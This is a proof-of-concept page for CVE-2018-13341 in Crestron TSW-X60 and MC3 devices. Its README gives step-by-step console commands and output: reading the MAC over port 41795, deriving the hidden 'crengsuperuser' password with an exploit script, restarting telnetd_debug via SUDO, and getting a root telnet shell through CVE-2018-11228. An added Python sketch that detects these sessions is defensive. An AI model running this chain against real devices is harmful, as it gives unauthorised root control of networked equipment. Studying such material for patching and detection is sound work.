CVE-2018-13341 PoC: Crestron TSW-X60 and MC3 Security Vulnerability

Source
Associated Vulnerability
Title: Crestron TSW-X60 and MC3 Security Vulnerability (CVE-2018-13341)
Description: In Crestron TSW-X60, all versions prior to 2.001.0037.001, and MC3, all versions prior to 1.502.0047.00, the passwords for special sudo accounts may be calculated using information accessible to those with regular user privileges. Attackers could decipher these passwords, which may allow them to execute hidden API calls and escape the CTP console sandbox environment with elevated privileges.
Description
This tool aims to exploit CVE-2018-13341
Readme
# CVE-2018-13341
This tool aims to exploit CVE-2018-13341. Using the MAC address of the targeted device, you can recover the password of the hidden *"crengsuperuser"* account, which has elevated privileges and allows you to run **SUDO** commands.


The Crestron Toolbox Protocol (CTP) console is reachable on port **41795** of the TSW-XX60 device. The `estat` command, available in that console, prints the device's MAC address:

```bash
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |
```

## Requirements

This tool requires the `cryptography` Python module.

```bash
# pip3 install cryptography
```
**OR**
```bash
# pip3 install -r requirements.txt
```

## Getting Started

```bash
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
```

## Exploiting CVE-2018-11228

[CVE-2018-11228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11228) allows unauthenticated RCE via the Bash Shell Service in Crestron Terminal Protocol (*CTP*). After getting the password of the hidden *"crengsuperuser"* account, you can get **root** access on the machine.

```bash
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>
```

Then, in a new shell, you can get **root** access on the box.

```bash
# telnet w.x.y.z

bash# whoami
root
```
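
For defenders, the console sessions above leave recognizable traces in a reassembled port-41795 stream. The following detection sketch is an added example, not part of the original tool or README; the function names, severity labels and the assumption that a network sensor hands you the plaintext session are all illustrative, and the matched line shapes are taken only from the transcripts shown above.

```python
import re

# Line shapes below are taken from the README's console transcripts; other
# firmware builds may word them differently (assumption).
PROMPT = re.compile(r"^[\w-]+>\s*(?P<cmd>\S.*)$")      # "TSW-760> <command>"
RESTARTED = re.compile(r"^Service (\S+) restarted$", re.I)
HIDDEN_ACCOUNT = "crengsuperuser"
RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

def scan_ctp_session(text):
    """Scan one reassembled port-41795 stream; return [(line_no, severity, message)]."""
    findings = []
    sudo_pending = False          # a SUDO command is waiting for its result
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = PROMPT.match(line)
        if m:
            cmd = m.group("cmd")
            verb = cmd.split()[0].upper()
            sudo_pending = verb == "SUDO"
            if sudo_pending:
                findings.append((n, "medium", f"SUDO command issued: {cmd}"))
                if "telnetd_debug" in cmd.lower():
                    findings.append((n, "high", "restart of telnetd_debug requested"))
            elif verb == "TELNETPORT":
                findings.append((n, "low", f"telnet setting touched: {cmd}"))
        elif line.lower().startswith("username:"):
            if line.split(":", 1)[1].strip().lower() == HIDDEN_ACCOUNT:
                findings.append((n, "high", f"login as hidden account {HIDDEN_ACCOUNT}"))
        elif sudo_pending and RESTARTED.match(line):
            findings.append((n, "critical", f"privileged restart succeeded: {line}"))
            sudo_pending = False
    return findings

def worst(findings):
    """Highest severity in a findings list, or None when the session is clean."""
    return max((sev for _, sev, _ in findings), key=RANK.get, default=None)

# Constructed sample input, modelled on the session shown in this README.
SAMPLE = """\
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
"""

if __name__ == "__main__":
    for finding in scan_ctp_session(SAMPLE):
        print(*finding, sep="\t")
```

A session that only runs `estat` produces no findings, so the rule set can run against all traffic to port 41795 and alert on `high` or above.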

Credit goes to: axcheron
File Snapshot

```
[4.0K] /data/pocs/b7bfc8a151a07d67b01766f65a9db381b4ed63fb
├── [1.9K] exploit.py
├── [1.9K] README.md
└── [  13] requirements.txt

0 directories, 3 files
```